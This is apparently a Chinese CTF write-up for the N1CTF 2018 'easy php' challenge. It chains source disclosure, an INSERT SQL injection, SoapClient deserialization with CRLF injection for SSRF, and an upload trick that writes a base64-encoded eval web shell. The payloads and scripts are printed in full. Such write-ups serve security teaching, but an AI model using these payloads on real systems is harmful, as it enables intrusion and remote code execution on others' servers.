N1CTF2018_Easyphp_WP

划了两天水~

题目叫做easy php,然而感觉并不easy啊:)。。解题步骤主要是源码审计,sql注入,ssrf,文件上传。。

看了下主要有注册,登录,发表签名和心情,删除签名的功能。

注册和登录页面需要提交验证码: substr(md5($input,0,5))==$captcha

getmd5.py
1
2
3
4
5
6
7
8
9
10
11
12
import hashlib, itertools, string
def brute(s):
    for i in range(1,6):
        for x in itertools.product(string.digits + string.ascii_lowercase, repeat=i):
            s1 = ''.join(x)
            if hashlib.md5(s1.encode('utf8')).hexdigest().startswith(s):
                print(s1)
                return
while(1):
    s = input()
    brute(s)

0x01. 通过加~获取到源码:index.php,user.php,config.php等,views/下有login等其他php文件源码。
0x02. 通过phpinfo,得到session文件位于../../var/lib/php5/sess_xxxxxx,也可通过获取进程的文件描述符来获取../../proc/self/fd/24
0x03. 通过源码审计发现user.php中的publish函数处存在insert注入。

我们POST提交的signature和mood参数,未经过滤就传进了insert()函数,在insert函数中,先调用了get_column函数将数组元素用反引号包裹,并用逗号隔开:`signature`,`mood` 。(先在session中获取自己的用户id。

payload
1
signature=aa`,0x4f3a343a224d6f6f64223a333a7b733a343a226d6f6f64223b693a313b733a323a226970223b733a393a223132372e302e302e31223b733a343a2264617465223b693a313532303636393134353b7d),(116,0x6b6b74657374,(select group_concat(username,0x7e,password,0x7e,ip,0x7e,is_admin) from ctf_users where is_admin=1),0x4f3a343a224d6f6f64223a333a7b733a343a226d6f6f64223b693a313b733a323a226970223b733a393a223132372e302e302e31223b733a343a2264617465223b693a313532303636393134353b7d)#&mood=0
/user.php:publish()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
function publish()
{
    if(!$this->check_login()) return false;
    if($this->is_admin == 0)
    {
        if(isset($_POST['signature']) && isset($_POST['mood'])) {
            $mood = addslashes(serialize(new Mood((int)$_POST['mood'],get_ip())));
            $db = new Db();
            @$ret = $db->insert(array('userid','username','signature','mood'),'ctf_user_signature',array($this->userid,$this->username,$_POST['signature'],$mood));
            if($ret)
                return true;
            else
                return false;
        }
    }
    else
    {
            if(isset($_FILES['pic'])) {
                if (upload($_FILES['pic'])){
                    echo 'upload ok!';
                    return true;
                }
                else {
                    echo "upload file error";
                    return false;
                }
            }
            else
                return false;
	}
}
config.php:insert()
1
2
3
4
5
6
7
8
9
10
public function insert($columns,$table,$values){
    $column = $this->get_column($columns);
    $value = '('.preg_replace('/`([^`,]+)`/','\'${1}\'',$this->get_column($values)).')';
    $nid =
    $sql = 'insert into '.$table.'('.$column.') values '.$value;
    $result = $this->conn->query($sql);
    return $result;
}
config.php:get_column()
1
2
3
4
5
6
7
8
9
private function get_column($columns){
    if(is_array($columns))
        $column = ' `'.implode('`,`',$columns).'` ';
    else
        $column = ' `'.$columns.'` ';
    return $column;
}

0x04. 访问index.php?action=index,得到admin帐号密码为admin:nu1ladmin。然而admin的登录要求为ip为127.0.0.1
0x05. **源码审计发现Mood类在user.php中的showmess函数中会反序列化并调用,又发现phpinfo中SoapClient开启。搜索一波后,发现可以通过反序列化构建SoapClient对象,构造POST包让服务端请求login页面,造成SSRF。

1
2
3
4
5
6
7
8
<?php 
$a = new SoapClient(null, array('uri' => '123','location' => 'http://127.0.0.1/index.php?action=login'));
echo serialize($a);
?>
//We got
O:10:"SoapClient":3:{s:3:"uri";s:3:"123";s:8:"location";s:39:"http://127.0.0.1/index.php?action=login";s:13:"_soap_version";i:1;}

在CRLF注入的基础上,我们可以得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php 
$a = unserialize('O:10:"SoapClient":3:{s:3:"uri";s:281:"http://www.ubuntu.com/
Content-Length: 0
POST /index.php?action=login HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=au4k8id9v05kln2mic004i58q3
username=admin&password=nu1ladmin&code=db0e
POST /whatever
";s:8:"location";s:39:"http://127.0.0.1/index.php?action=login";s:13:"_soap_version";i:1;}');
echo $a->cc();
?>

运行nc -lvvp 80来监听80端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
POST /index.php?action=login HTTP/1.1
Host: 127.0.0.1
Connection: Keep-Alive
User-Agent: PHP-SOAP/5.3.29
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://www.ubuntu.com/
Content-Length: 0
POST /index.php?action=login HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=au4k8id9v05kln2mic004i58q3
username=admin&password=nu1ladmin&code=db0e
POST /whatever
#cc"
Content-Length: 643
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://www.ubuntu.com/
Content-Length: 0
POST /index.php?action=login HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=au4k8id9v05kln2mic004i58q3
username=admin&password=nu1ladmin&code=db0e
POST /whatever
" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:cc/></SOAP-ENV:Body></SOAP-ENV:Envelope>

Apache收到后将识别为三个POST包:

因此,我们可先获取一个新的session,作为admin账户的session,并获取其验证码,生成payload:

genPayload.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php 
$a = bin2hex('O:10:"SoapClient":3:{s:3:"uri";s:281:"http://www.ubuntu.com/
Content-Length: 0
POST /index.php?action=login HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=au4k8id9v05kln2mic004i58q3
username=admin&password=nu1ladmin&code=db0e
POST /whatever
";s:8:"location";s:39:"http://127.0.0.1/index.php?action=login";s:13:"_soap_version";i:1;}');
echo $a;
?>
//We got
//4f3a31303a22536f6170436c69656e74223a333a7b733a333a22757269223b733a3238313a22687474703a2f2f7777772e7562756e74752e636f6d2f0d0a436f6e74656e742d4c656e6774683a20300d0a0d0a0d0a504f5354202f696e6465782e7068703f616374696f6e3d6c6f67696e20485454502f312e310d0a486f73743a203132372e302e302e310d0a436f6e74656e742d4c656e6774683a2034330d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6f6b69653a205048505345535349443d6175346b386964397630356b6c6e326d696330303469353871330d0a0d0a757365726e616d653d61646d696e2670617373776f72643d6e75316c61646d696e26636f64653d646230650d0a504f5354202f77686174657665720d0a223b733a383a226c6f636174696f6e223b733a33393a22687474703a2f2f3132372e302e302e312f696e6465782e7068703f616374696f6e3d6c6f67696e223b733a31333a225f736f61705f76657273696f6e223b693a313b7d

得到我们的payload,通过已登录的用户X在publish页面中POST。

1
signature=aa`,0x4f3a31303a22536f6170436c69656e74223a333a7b733a333a22757269223b733a3238313a22687474703a2f2f7777772e7562756e74752e636f6d2f0d0a436f6e74656e742d4c656e6774683a20300d0a0d0a0d0a504f5354202f696e6465782e7068703f616374696f6e3d6c6f67696e20485454502f312e310d0a486f73743a203132372e302e302e310d0a436f6e74656e742d4c656e6774683a2034330d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6f6b69653a205048505345535349443d6175346b386964397630356b6c6e326d696330303469353871330d0a0d0a757365726e616d653d61646d696e2670617373776f72643d6e75316c61646d696e26636f64653d646230650d0a504f5354202f77686174657665720d0a223b733a383a226c6f636174696f6e223b733a33393a22687474703a2f2f3132372e302e302e312f696e6465782e7068703f616374696f6e3d6c6f67696e223b733a31333a225f736f61705f76657273696f6e223b693a313b7d)#&mood=0

此时访问用户X的index.php?action=index页面。返回状态码500,反序列化成功。

0x06. 以admin的session登录,通过源码发现在publish函数处可upload图片文件

config.php:upload()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
function upload($file){
    $file_size  = $file['size'];
    if($file_size>2*1024*1024) {
        echo "pic is too big!";
        return false;
    }
    $file_type = $file['type'];
    if($file_type!="image/jpeg" && $file_type!='image/pjpeg') {
        echo "file type invalid";
        return false;
    }
    if(is_uploaded_file($file['tmp_name'])) {
        $uploaded_file = $file['tmp_name'];
        $user_path =  "/app/adminpic";
        if (!file_exists($user_path)) {
            mkdir($user_path);
        }
        $file_true_name = str_replace('.','',pathinfo($file['name'])['filename']);
        $file_true_name = str_replace('/','',$file_true_name);
        $file_true_name = str_replace('\\','',$file_true_name);
        $file_true_name = $file_true_name.time().rand(1,100).'.jpg';
        $move_to_file = $user_path."/".$file_true_name;
        if(move_uploaded_file($uploaded_file,$move_to_file)) {
            if(stripos(file_get_contents($move_to_file),'<?php')>=0)
                system('sh /home/nu1lctf/clean_danger.sh');
            return $file_true_name;
        }
        else
            return false;
    }
    else
        return false;
}

upload函数将文件名改为filename.time().rand(1,100).'jpg',然后保存在了/app/adminpic/下,同时对文件内容的进行了检测,若存在<?php,则执行clean_danger.sh

clean_danger.sh
1
2
cd /app/adminpic/
rm *.jpg

phpinfo中,我们可以看到,short_open_tag = Off,但是依然可以使用<?=来执行php代码。

0x07. 上传一个crxxx.jpg

crxxx.jpg
1
<?=file_put_contents("/var/www/html/kkzxc123.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2tleV0pOz8+"));

从服务端返回的时间,转化成Unix时间戳,然后对rand(1,100)进行爆破。即可得到真实文件名。通过index.php?action=xxxx.jpg包含,就生成了/var/www/html/kkzxc123.php

0x08. 菜刀连接,根据run.sh中数据库密码,可在数据库中拿到flag。

  • 对于另外一题funning eating cms,主要是考察parse_url()存在解析的漏洞,遇到:时,会直接返回false。

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家